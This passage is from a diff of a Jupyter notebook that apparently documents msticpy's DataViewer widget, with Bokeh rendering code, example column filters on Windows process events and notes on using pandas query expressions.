,\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1688\"},\"selection_policy\":{\"id\":\"1689\"}},\"id\":\"1586\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"editor\":{\"id\":\"1691\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1690\"},\"title\":\"Account\",\"width\":26},\"id\":\"1610\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1688\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1692\",\"type\":\"StringFormatter\"},{\"attributes\":{\"booleans\":[false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false]},\"id\":\"1619\",\"type\":\"BooleanFilter\"},{\"attributes\":{\"editor\":{\"id\":\"1700\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1699\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1614\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1696\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1693\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1692\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1611\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1700\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1690\",\"type\":\"StringFormatter\"},{\"attributes\":{\"filters\":[{\"id\":\"1619\"}],\"source\":{\"id\":\"1586\"}},\"id\":\"1620\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1698\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1702\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1701\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1615\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1696\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1695\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1612\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1616\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1694\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1616\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1617\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1702\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1695\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1608\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n",
+       "  var render_items = [{\"docid\":\"9f99a709-de57-4c7f-80e9-30ace23bde13\",\"notebook_comms_target\":\"1703\",\"root_ids\":[\"1608\"],\"roots\":{\"1608\":\"a7b176c6-e8a3-485e-919d-500035a0ca26\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1608"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ea45bf84dd3646578c9f60b4113bea79",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "viewer = DataViewer(data, selected_cols=columns)\n",
+    "\n",
+    "# manually add a filter \n",
+    "sample_filter = {\n",
+    "    \"ParentProcessName contains 'cmd'\": (\"ParentProcessName\", False, \"contains\", \"cmd\"),\n",
+    "    \"CommandLine contains 'script'\": (\"CommandLine\", False, \"contains\", \"script\"),\n",
+    "}\n",
+    "viewer.import_filters(sample_filter)\n",
+    "\n",
+    "# We're opening the \"Filter data\" drop-down programmatically\n",
+    "# Just click on the small arrow to the left of \"Filter data\" to open this\n",
+    "viewer.accordion.selected_index = 1\n",
+    "viewer"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{\"ParentProcessName contains 'cmd'\": FilterExpr(column='ParentProcessName', inv=False, operator='contains', expr='cmd'),\n",
+       " \"CommandLine contains 'script'\": FilterExpr(column='CommandLine', inv=False, operator='contains', expr='script')}"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "viewer.filters"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Advanced querying with filter **query** operator\n",
+    "\n",
+    "The **query** operator lets you type in a pandas query expression.\n",
+    "\n",
+    "> Note, the selected column is not relevant for this operator since you specify the column name<br>\n",
+    "> within the query expression. You can select any column name.\n",
+    "\n",
+    "See this documentation for the [syntax of the pandas `query` method ](https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#the-query-method)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(null);\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error(url) {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (let i = 0; i < css_urls.length; i++) {\n",
+       "      const url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n",
+       "\n",
+       "    for (let i = 0; i < js_urls.length; i++) {\n",
+       "      const url = js_urls[i];\n",
+       "      const element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(null);\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"277f4152-464f-468f-a691-b8b365abe662\" data-root-id=\"1801\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"64015a85-dd87-47e6-a6eb-8974bf509dca\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1803\"},{\"id\":\"1804\"},{\"id\":\"1810\"},{\"id\":\"1805\"},{\"id\":\"1806\"},{\"id\":\"1807\"},{\"id\":\"1808\"}],\"editable\":true,\"height\":160,\"source\":{\"id\":\"1779\"},\"view\":{\"id\":\"1813\"},\"width_policy\":\"max\"},\"id\":\"1801\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1899\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1899\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1898\"},\"title\":\"Account\",\"width\":26},\"id\":\"1803\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1903\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1907\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1901\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1900\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1804\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1902\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1809\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1810\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1898\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1910\",\"type\":\"StringEditor\"},{\"attributes\":{\"filters\":[{\"id\":\"1812\"}],\"source\":{\"id\":\"1779\"}},\"id\":\"1813\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1908\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1896\",\"type\":\"Selection\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTI